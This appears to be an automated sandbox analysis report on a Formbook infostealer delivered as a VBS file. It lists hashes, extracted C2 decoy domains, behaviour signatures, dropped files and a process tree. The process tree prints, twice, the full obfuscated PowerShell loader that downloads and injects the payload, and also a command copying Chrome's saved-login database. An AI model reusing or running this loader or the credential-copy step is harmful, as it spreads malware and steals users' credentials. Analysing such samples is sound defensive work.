Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/07/2024, 10:27

General

  • Target

    71abad95eeb66ea1fc076a33659dba34d9404a08eb4ad1aaf32c41754abd332e.vbs

  • Size

    31KB

  • MD5

    5cbf0fb04e1714ebe00fd744a24b109c

  • SHA1

    4c2a52cad1cafba41f7af6c4385a261b972573f2

  • SHA256

    71abad95eeb66ea1fc076a33659dba34d9404a08eb4ad1aaf32c41754abd332e

  • SHA512

    fb56c70a852e3f619c28742e5373a32e0b48614db70a83b4d84fdef29e5120d16e01c9880b91d9e25cd2dfe9e916eb7b2ec5706d18c0db861fe754bc71c58409

  • SSDEEP

    384:6zMKK76JtZbJBuBdWZz+M6e7cmjP0irkQML:6zMKHJtZdcc+3Zm/rkzL

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

ss24

Decoy

agingwellhc.com

unikbetanggur.autos

eb2024yl.top

ja380.xyz

thehalcyon.studio

maudsoogrim.com

esteler10.click

mewtcp.xyz

www-zjbf1.club

kucinglucu.online

lunwencheck.com

65597.photos

erbxeu358h.top

startable.online

yousend.xyz

csharksg.com

centricoatings.com

ntruhslearn.xyz

achabakra.xyz

zuntool.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 3 IoCs
  • Adds policy Run key to start application 2 TTPs 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\71abad95eeb66ea1fc076a33659dba34d9404a08eb4ad1aaf32c41754abd332e.vbs"
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Selskabsbroder Enswathes Deplorableness Syndefuldeste Kursusmateriale Nonoccupancy saftflaskernes Isohesperidin Datamatiserings Orthostates Pinite Unrealizables Wergeld Pyntens Lyknskning Boreformandens Formenendes219 Embosoms Mlechchha Indberetningspligtens Salinification Porcelaenshund Unanalogousness Armipotence Selskabsbroder Enswathes Deplorableness Syndefuldeste Kursusmateriale Nonoccupancy saftflaskernes Isohesperidin Datamatiserings Orthostates Pinite Unrealizables Wergeld Pyntens Lyknskning Boreformandens Formenendes219 Embosoms Mlechchha Indberetningspligtens Salinification Porcelaenshund Unanalogousness Armipotence';If (${host}.CurrentCulture) {$Forstavelse='SUBsTR';$Afdkk52++;}$Forstavelse+='ing';Function Choreographer($Endura){$Uncontaminate=$Endura.Length-$Afdkk52;For( $Morgnerne=2;$Morgnerne -lt $Uncontaminate;$Morgnerne+=3){$Selskabsbroder+=$Endura.$Forstavelse.Invoke( $Morgnerne, $Afdkk52);}$Selskabsbroder;}function Digitaldisplay($Sykofants){ . ($Ringvejens) ($Sykofants);}$Wiretap=Choreographer 'TiM,uoUnzUni ilKolC,a o/An5 S..t0 i T (InW BiVin.rdS,oSpwTesLi ,NDeTTi 1Er0Di.Sp0Ko; F NlWVaiAen ,6 4Aa;D. B x 6Pe4O,;Ba TerTevPo:De1Ju2Sl1 o..i0Sc) B OvGuneB,cA kBeoOf/Ea2Ko0R 1Up0.o0Th1Cr0Om1Mi A,F.liBor ,eAcfAloFexBe/Ga1Er2 a1N..uv0 . ';$Jeopardizes=Choreographer ',pUPrsV,eDor,j-AaA ng FeF nwatSt ';$Kursusmateriale=Choreographer ',ih Lt Ntpsp TsWi: u/ H/ dTereni BvSreP..Ung roHyoAngCrlUbeIn. Rc oP,mUn/.iu cCo? Ie Oxt.p,no or,etSa=krdMaoAmw ,n SlAro NaIndS,&SiiPldF,= 1 Ste q e0mnNDeEOl9,rN il IaVkDMomInfT xP,USkTC.BCy_in7Or3Stm nzBagin7A,D V .JKiYSkQ fBTr7 ,r Uw A ';$Dykningens=Choreographer ' R> . ';$Ringvejens=Choreographer ',si,neByxRe ';$Drosches='Isohesperidin';$Unpromulgated = Choreographer ' Ne Ac ahVooFe Li% ,a TpUdpAmdRea tS.aVi%An\ErUHadU lS.eB.d en,ti gnU.gDi. EPUneSkrEc D.&Ba&N, Ue ocA.hInoFy svtK, ';Digitaldisplay (Choreographer 'Sy$VagEul eoCab kaFll,o:FlSSuk,hiDem ,mFoeO l .s TvDia mE,psee L=A ( lc,rmIndS ,/Arc,i S$FoULin JpOpr VoExmU.u.pl,ogIna PtMee UdPr)O, ');Digitaldisplay (Choreographer 'Zo$Grg HlU.oFubHua hl :MiS Uyunn,rdM e dfTuu PlPrdU ebasCytN.ema= $RuK yuFirT s .u.rsOfm.la TtPae rr .iCha BlB,e.a. ,sI.p Il .iAat i(ro$SpD Iy ekFlnF,is n gKneUnn ,sBe)Sa ');Digitaldisplay (Choreographer 'Ho[ .NexeD tU,..aSSteGar bvEnig.cBae HPArodeiPenF,tUdMU.aLanThaMigFee .r ,]gl: .:FrS .ePhcS,uP rFriL,tPayFoP FrUnoPatApoS,c .o Bl Ly=Ov R [T NUneOctSc.R SIneTicPau,irHoiR.tR,yS PZerA ourtTro,dcWioGolE.T RyprpAfeM ]Tn: w: kTBalH.sSp1 ,2Ar ');$Kursusmateriale=$Syndefuldeste[0];$Smldfed= (Choreographer ',e$.eg sl mo ,b Oa llDe: tSG.k ,r im,kb arJutPat oeJvrPo=CzNsoeCawIn-StOHebAfj neMacG.tMi P,S nyH.sDetK,eSpmCu.R.NSge tRe.UnWGrem bBeCoplfeiAmeS n.at');$Smldfed+=$Skimmelsvampe[1];Digitaldisplay ($Smldfed);Digitaldisplay (Choreographer ' R$NuS.rkIdrSkmS,bFor LtRotUdeS r C. H .e PausdKae Cr hsEn[P,$MiJ,oe,ooDupO aMirSodKuiSkzflef.sSt].e= P$R.W.oiMerbaeM tKuaCopFo ');$Dirigibility64=Choreographer '.t$.kS Uk ,r ImB,bfarN tTot yefor,a. FD loSawDan ,lP oBeaS dDoFGaiS lRoes,(,j$PeKYduc rnes ,u Ds.umAnaMetGreHerR i eaPalTeeA.,Un$ UP HoB rHac eSulTeaIneP n TsAdhDeutinLid.a)Ud ';$Porcelaenshund=$Skimmelsvampe[0];Digitaldisplay (Choreographer 'St$ RgPhlBao Mb ,aNolSy:C,CStaNimNobF rFyi c ,e inFrsPe=Aa( iTUpe HsA.tU,-KnPE.aT.t,uh . d$IrPteoByrImc Pe Rl Aa,he n VsSuhFlu sn Pd.o) S ');while (!$Cambricens) {Digitaldisplay (Choreographer 'D,$BegKal .oPobK,aU,l,r:TuRDruEdlEvl OeRamApa ad Ar EaPhs Ds oe Sn Q1Fr7Re1L =Sl$ At,pr ,uRaeJo ') ;Digitaldisplay $Dirigibility64;Digitaldisplay (Choreographer 'FuS,utLiaK.rGrt a-PaS Fl Ne OeFupJo Di4 M ');Digitaldisplay (Choreographer 'L $Eng PlAco.rbC,aU,l U:D,C Pab,m .bCir DiAbcPae Bn tsSn= P(F.Tp e SsStt y-SmPStaSwtUnhTy su$,lPWaoTrr .cSeeSwl .aP,eDunKas nh tuP nRadKn)Tr ') ;Digitaldisplay (Choreographer 'Es$,ygFll,noNab caNglEx: SDR eBypCol GoS rTra bStl ne PnJoe ksH.spo=Kl$Fug l HoBibD.aCal .:FrER,nNesj,wReaThtS,h,ye BsG + A+e,% S$,tSEryElnRedDie f,eu RlE.d te asPstFaeN .StcTeotau FnSatC. ') ;$Kursusmateriale=$Syndefuldeste[$Deplorableness];}$Unimbanked=307700;$Trouss=26859;Digitaldisplay (Choreographer ',o$ pg El HoArbHoaOul k: LDPra .tFlaUsmEna BtNaiBosL eGrrFriBynQugTes A Bi=Ak uG eActMi-A.C ohunStt ,eHan,ptT. Om$ ,Pf,oH,r c.re .lRea .eNenPisPoh .uS nDid F ');Digitaldisplay (Choreographer ' $TogStlE o.obBaaNulOc: KB,l FiOlpG p.oe is,tpGlaK.lDetOceStr .n Pe.es , R= e L[KiSOvy Bs Bt ne im n..oCPlo ,n,kvCoeObr,ut B]F.: T:s FHerUnoFim OBtraTisVeePr6S,4 KS MtCor ,iTrnShgBr(Mi$ UDnoaPrtEla lm,raT.tOsiTrsS e.rr Si pn PgStsAn)Ba ');Digitaldisplay (Choreographer ' $TrgS l Mo.obf,aL lSt:TaUNon BrFae daVal ,i .z.yaAlb Dl jeudsMo O =Am B,[U S uyPrsPotPee ImSe.UnTHeeBaxT tBr.PrEDenA c,moGrdleiK nSvg K]br:Pa: OAS SUnCF I SIFr.NoG .eRetInSAmtDdrGui BnBog p(.i$WiKColA iNop,upAseR,sMupInaEtlCatSteCorL,nLieYusC,)U ');Digitaldisplay (Choreographer 'E $ Ag tl Io .b .aO lve:FoBMaeS.tAroSyn Dk DlAno ,d .s,reU.r B=Ug$GkU .nslrV eSca,ilUniLizR,aKib .lNoe SsSt.Tes,yu AbL,sLotMrrPaiInn SgIm(Fi$SeUFin OiAmmFlb Sa SnSpkS e SdSl, .$inTWirDooFouP,sFlsVa)Ep ');Digitaldisplay $Betonklodser;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3424
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udledning.Per && echo t"
          4⤵
            PID:2800
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Selskabsbroder Enswathes Deplorableness Syndefuldeste Kursusmateriale Nonoccupancy saftflaskernes Isohesperidin Datamatiserings Orthostates Pinite Unrealizables Wergeld Pyntens Lyknskning Boreformandens Formenendes219 Embosoms Mlechchha Indberetningspligtens Salinification Porcelaenshund Unanalogousness Armipotence Selskabsbroder Enswathes Deplorableness Syndefuldeste Kursusmateriale Nonoccupancy saftflaskernes Isohesperidin Datamatiserings Orthostates Pinite Unrealizables Wergeld Pyntens Lyknskning Boreformandens Formenendes219 Embosoms Mlechchha Indberetningspligtens Salinification Porcelaenshund Unanalogousness Armipotence';If (${host}.CurrentCulture) {$Forstavelse='SUBsTR';$Afdkk52++;}$Forstavelse+='ing';Function Choreographer($Endura){$Uncontaminate=$Endura.Length-$Afdkk52;For( $Morgnerne=2;$Morgnerne -lt $Uncontaminate;$Morgnerne+=3){$Selskabsbroder+=$Endura.$Forstavelse.Invoke( $Morgnerne, $Afdkk52);}$Selskabsbroder;}function Digitaldisplay($Sykofants){ . ($Ringvejens) ($Sykofants);}$Wiretap=Choreographer 'TiM,uoUnzUni ilKolC,a o/An5 S..t0 i T (InW BiVin.rdS,oSpwTesLi ,NDeTTi 1Er0Di.Sp0Ko; F NlWVaiAen ,6 4Aa;D. B x 6Pe4O,;Ba TerTevPo:De1Ju2Sl1 o..i0Sc) B OvGuneB,cA kBeoOf/Ea2Ko0R 1Up0.o0Th1Cr0Om1Mi A,F.liBor ,eAcfAloFexBe/Ga1Er2 a1N..uv0 . ';$Jeopardizes=Choreographer ',pUPrsV,eDor,j-AaA ng FeF nwatSt ';$Kursusmateriale=Choreographer ',ih Lt Ntpsp TsWi: u/ H/ dTereni BvSreP..Ung roHyoAngCrlUbeIn. Rc oP,mUn/.iu cCo? Ie Oxt.p,no or,etSa=krdMaoAmw ,n SlAro NaIndS,&SiiPldF,= 1 Ste q e0mnNDeEOl9,rN il IaVkDMomInfT xP,USkTC.BCy_in7Or3Stm nzBagin7A,D V .JKiYSkQ fBTr7 ,r Uw A ';$Dykningens=Choreographer ' R> . ';$Ringvejens=Choreographer ',si,neByxRe ';$Drosches='Isohesperidin';$Unpromulgated = Choreographer ' Ne Ac ahVooFe Li% ,a TpUdpAmdRea tS.aVi%An\ErUHadU lS.eB.d en,ti gnU.gDi. EPUneSkrEc D.&Ba&N, Ue ocA.hInoFy svtK, ';Digitaldisplay (Choreographer 'Sy$VagEul eoCab kaFll,o:FlSSuk,hiDem ,mFoeO l .s TvDia mE,psee L=A ( lc,rmIndS ,/Arc,i S$FoULin JpOpr VoExmU.u.pl,ogIna PtMee UdPr)O, ');Digitaldisplay (Choreographer 'Zo$Grg HlU.oFubHua hl :MiS Uyunn,rdM e dfTuu PlPrdU ebasCytN.ema= $RuK yuFirT s .u.rsOfm.la TtPae rr .iCha BlB,e.a. ,sI.p Il .iAat i(ro$SpD Iy ekFlnF,is n gKneUnn ,sBe)Sa ');Digitaldisplay (Choreographer 'Ho[ .NexeD tU,..aSSteGar bvEnig.cBae HPArodeiPenF,tUdMU.aLanThaMigFee .r ,]gl: .:FrS .ePhcS,uP rFriL,tPayFoP FrUnoPatApoS,c .o Bl Ly=Ov R [T NUneOctSc.R SIneTicPau,irHoiR.tR,yS PZerA ourtTro,dcWioGolE.T RyprpAfeM ]Tn: w: kTBalH.sSp1 ,2Ar ');$Kursusmateriale=$Syndefuldeste[0];$Smldfed= (Choreographer ',e$.eg sl mo ,b Oa llDe: tSG.k ,r im,kb arJutPat oeJvrPo=CzNsoeCawIn-StOHebAfj neMacG.tMi P,S nyH.sDetK,eSpmCu.R.NSge tRe.UnWGrem bBeCoplfeiAmeS n.at');$Smldfed+=$Skimmelsvampe[1];Digitaldisplay ($Smldfed);Digitaldisplay (Choreographer ' R$NuS.rkIdrSkmS,bFor LtRotUdeS r C. H .e PausdKae Cr hsEn[P,$MiJ,oe,ooDupO aMirSodKuiSkzflef.sSt].e= P$R.W.oiMerbaeM tKuaCopFo ');$Dirigibility64=Choreographer '.t$.kS Uk ,r ImB,bfarN tTot yefor,a. FD loSawDan ,lP oBeaS dDoFGaiS lRoes,(,j$PeKYduc rnes ,u Ds.umAnaMetGreHerR i eaPalTeeA.,Un$ UP HoB rHac eSulTeaIneP n TsAdhDeutinLid.a)Ud ';$Porcelaenshund=$Skimmelsvampe[0];Digitaldisplay (Choreographer 'St$ RgPhlBao Mb ,aNolSy:C,CStaNimNobF rFyi c ,e inFrsPe=Aa( iTUpe HsA.tU,-KnPE.aT.t,uh . d$IrPteoByrImc Pe Rl Aa,he n VsSuhFlu sn Pd.o) S ');while (!$Cambricens) {Digitaldisplay (Choreographer 'D,$BegKal .oPobK,aU,l,r:TuRDruEdlEvl OeRamApa ad Ar EaPhs Ds oe Sn Q1Fr7Re1L =Sl$ At,pr ,uRaeJo ') ;Digitaldisplay $Dirigibility64;Digitaldisplay (Choreographer 'FuS,utLiaK.rGrt a-PaS Fl Ne OeFupJo Di4 M ');Digitaldisplay (Choreographer 'L $Eng PlAco.rbC,aU,l U:D,C Pab,m .bCir DiAbcPae Bn tsSn= P(F.Tp e SsStt y-SmPStaSwtUnhTy su$,lPWaoTrr .cSeeSwl .aP,eDunKas nh tuP nRadKn)Tr ') ;Digitaldisplay (Choreographer 'Es$,ygFll,noNab caNglEx: SDR eBypCol GoS rTra bStl ne PnJoe ksH.spo=Kl$Fug l HoBibD.aCal .:FrER,nNesj,wReaThtS,h,ye BsG + A+e,% S$,tSEryElnRedDie f,eu RlE.d te asPstFaeN .StcTeotau FnSatC. ') ;$Kursusmateriale=$Syndefuldeste[$Deplorableness];}$Unimbanked=307700;$Trouss=26859;Digitaldisplay (Choreographer ',o$ pg El HoArbHoaOul k: LDPra .tFlaUsmEna BtNaiBosL eGrrFriBynQugTes A Bi=Ak uG eActMi-A.C ohunStt ,eHan,ptT. Om$ ,Pf,oH,r c.re .lRea .eNenPisPoh .uS nDid F ');Digitaldisplay (Choreographer ' $TogStlE o.obBaaNulOc: KB,l FiOlpG p.oe is,tpGlaK.lDetOceStr .n Pe.es , R= e L[KiSOvy Bs Bt ne im n..oCPlo ,n,kvCoeObr,ut B]F.: T:s FHerUnoFim OBtraTisVeePr6S,4 KS MtCor ,iTrnShgBr(Mi$ UDnoaPrtEla lm,raT.tOsiTrsS e.rr Si pn PgStsAn)Ba ');Digitaldisplay (Choreographer ' $TrgS l Mo.obf,aL lSt:TaUNon BrFae daVal ,i .z.yaAlb Dl jeudsMo O =Am B,[U S uyPrsPotPee ImSe.UnTHeeBaxT tBr.PrEDenA c,moGrdleiK nSvg K]br:Pa: OAS SUnCF I SIFr.NoG .eRetInSAmtDdrGui BnBog p(.i$WiKColA iNop,upAseR,sMupInaEtlCatSteCorL,nLieYusC,)U ');Digitaldisplay (Choreographer 'E $ Ag tl Io .b .aO lve:FoBMaeS.tAroSyn Dk DlAno ,d .s,reU.r B=Ug$GkU .nslrV eSca,ilUniLizR,aKib .lNoe SsSt.Tes,yu AbL,sLotMrrPaiInn SgIm(Fi$SeUFin OiAmmFlb Sa SnSpkS e SdSl, .$inTWirDooFouP,sFlsVa)Ep ');Digitaldisplay $Betonklodser;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1560
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udledning.Per && echo t"
              5⤵
                PID:2996
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                PID:3368
        • C:\Windows\SysWOW64\autochk.exe
          "C:\Windows\SysWOW64\autochk.exe"
          2⤵
            PID:3756
          • C:\Windows\SysWOW64\control.exe
            "C:\Windows\SysWOW64\control.exe"
            2⤵
            • Adds policy Run key to start application
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3488
            • C:\Windows\SysWOW64\cmd.exe
              /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
              3⤵
                PID:2668
              • C:\Program Files\Mozilla Firefox\Firefox.exe
                "C:\Program Files\Mozilla Firefox\Firefox.exe"
                3⤵
                  PID:812

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\DB1

                    Filesize

                    40KB

                    MD5

                    a182561a527f929489bf4b8f74f65cd7

                    SHA1

                    8cd6866594759711ea1836e86a5b7ca64ee8911f

                    SHA256

                    42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                    SHA512

                    9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ckrat2py.byn.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Roaming\K67QQ724\K67logim.jpeg

                    Filesize

                    82KB

                    MD5

                    9c5dad9bf828a9430515671b9de6602a

                    SHA1

                    81b469824c1352b31984fb9c6534cba91bac7e80

                    SHA256

                    a9f8eb5dc94e61f6cf3e1621b4b612e85cd6f3e00b574ec1730ddf7fa73a602a

                    SHA512

                    69b4f5ac93e00cb825a2b437b9de166f54071631310e5cd15c95e4351bde783d4fe488d4ddbefec2536460dcd4f0a3730934de8d47efae39df71019323050a2b

                  • C:\Users\Admin\AppData\Roaming\K67QQ724\K67logrf.ini

                    Filesize

                    40B

                    MD5

                    2f245469795b865bdd1b956c23d7893d

                    SHA1

                    6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

                    SHA256

                    1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

                    SHA512

                    909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

                  • C:\Users\Admin\AppData\Roaming\K67QQ724\K67logrg.ini

                    Filesize

                    38B

                    MD5

                    4aadf49fed30e4c9b3fe4a3dd6445ebe

                    SHA1

                    1e332822167c6f351b99615eada2c30a538ff037

                    SHA256

                    75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56

                    SHA512

                    eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

                  • C:\Users\Admin\AppData\Roaming\K67QQ724\K67logri.ini

                    Filesize

                    40B

                    MD5

                    d63a82e5d81e02e399090af26db0b9cb

                    SHA1

                    91d0014c8f54743bba141fd60c9d963f869d76c9

                    SHA256

                    eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

                    SHA512

                    38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

                  • C:\Users\Admin\AppData\Roaming\K67QQ724\K67logrv.ini

                    Filesize

                    872B

                    MD5

                    bbc41c78bae6c71e63cb544a6a284d94

                    SHA1

                    33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a

                    SHA256

                    ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb

                    SHA512

                    0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

                  • C:\Users\Admin\AppData\Roaming\Udledning.Per

                    Filesize

                    435KB

                    MD5

                    eb8c8f199dabfedb048f6991d7d751d9

                    SHA1

                    7bfb1808f106a2d6daf4b619b4c08962026eb06d

                    SHA256

                    e307d9b0d37a933e9f723eb432c78b229d65ebb640e7e1dd9fb0d370a3a73f1e

                    SHA512

                    8c26ace07e83d20d0b8b60ee8a52464395d69286c2f9769cc6e30f18ccd8d486f3769b92c72f83d56a5acb9f50289b0d2e03edd537066a566be5eabe99c00dd2

                  • memory/1560-39-0x0000000007330000-0x0000000007352000-memory.dmp

                    Filesize

                    136KB

                  • memory/1560-40-0x00000000080D0000-0x0000000008674000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/1560-33-0x0000000005B30000-0x0000000005E84000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/1560-34-0x0000000006100000-0x000000000611E000-memory.dmp

                    Filesize

                    120KB

                  • memory/1560-35-0x0000000006140000-0x000000000618C000-memory.dmp

                    Filesize

                    304KB

                  • memory/1560-36-0x0000000007A50000-0x00000000080CA000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/1560-37-0x00000000071F0000-0x000000000720A000-memory.dmp

                    Filesize

                    104KB

                  • memory/1560-38-0x00000000073D0000-0x0000000007466000-memory.dmp

                    Filesize

                    600KB

                  • memory/1560-19-0x0000000002800000-0x0000000002836000-memory.dmp

                    Filesize

                    216KB

                  • memory/1560-21-0x0000000005250000-0x0000000005272000-memory.dmp

                    Filesize

                    136KB

                  • memory/1560-22-0x0000000005920000-0x0000000005986000-memory.dmp

                    Filesize

                    408KB

                  • memory/1560-42-0x0000000008680000-0x000000000E369000-memory.dmp

                    Filesize

                    92.9MB

                  • memory/1560-20-0x0000000005280000-0x00000000058A8000-memory.dmp

                    Filesize

                    6.2MB

                  • memory/1560-23-0x0000000005AC0000-0x0000000005B26000-memory.dmp

                    Filesize

                    408KB

                  • memory/3368-58-0x0000000000400000-0x00000000005E4000-memory.dmp

                    Filesize

                    1.9MB

                  • memory/3368-59-0x0000000000400000-0x00000000005E4000-memory.dmp

                    Filesize

                    1.9MB

                  • memory/3368-63-0x0000000000400000-0x00000000005E4000-memory.dmp

                    Filesize

                    1.9MB

                  • memory/3424-44-0x00007FFF116A0000-0x00007FFF12161000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3424-62-0x00007FFF116A0000-0x00007FFF12161000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3424-43-0x00007FFF116A3000-0x00007FFF116A5000-memory.dmp

                    Filesize

                    8KB

                  • memory/3424-4-0x00007FFF116A3000-0x00007FFF116A5000-memory.dmp

                    Filesize

                    8KB

                  • memory/3424-16-0x00007FFF116A0000-0x00007FFF12161000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3424-15-0x00007FFF116A0000-0x00007FFF12161000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3424-14-0x0000016AE2040000-0x0000016AE2062000-memory.dmp

                    Filesize

                    136KB

                  • memory/3436-84-0x000000000A1E0000-0x000000000A2FF000-memory.dmp

                    Filesize

                    1.1MB

                  • memory/3488-65-0x0000000000D20000-0x0000000000D47000-memory.dmp

                    Filesize

                    156KB

                  • memory/3488-66-0x0000000000970000-0x000000000099F000-memory.dmp

                    Filesize

                    188KB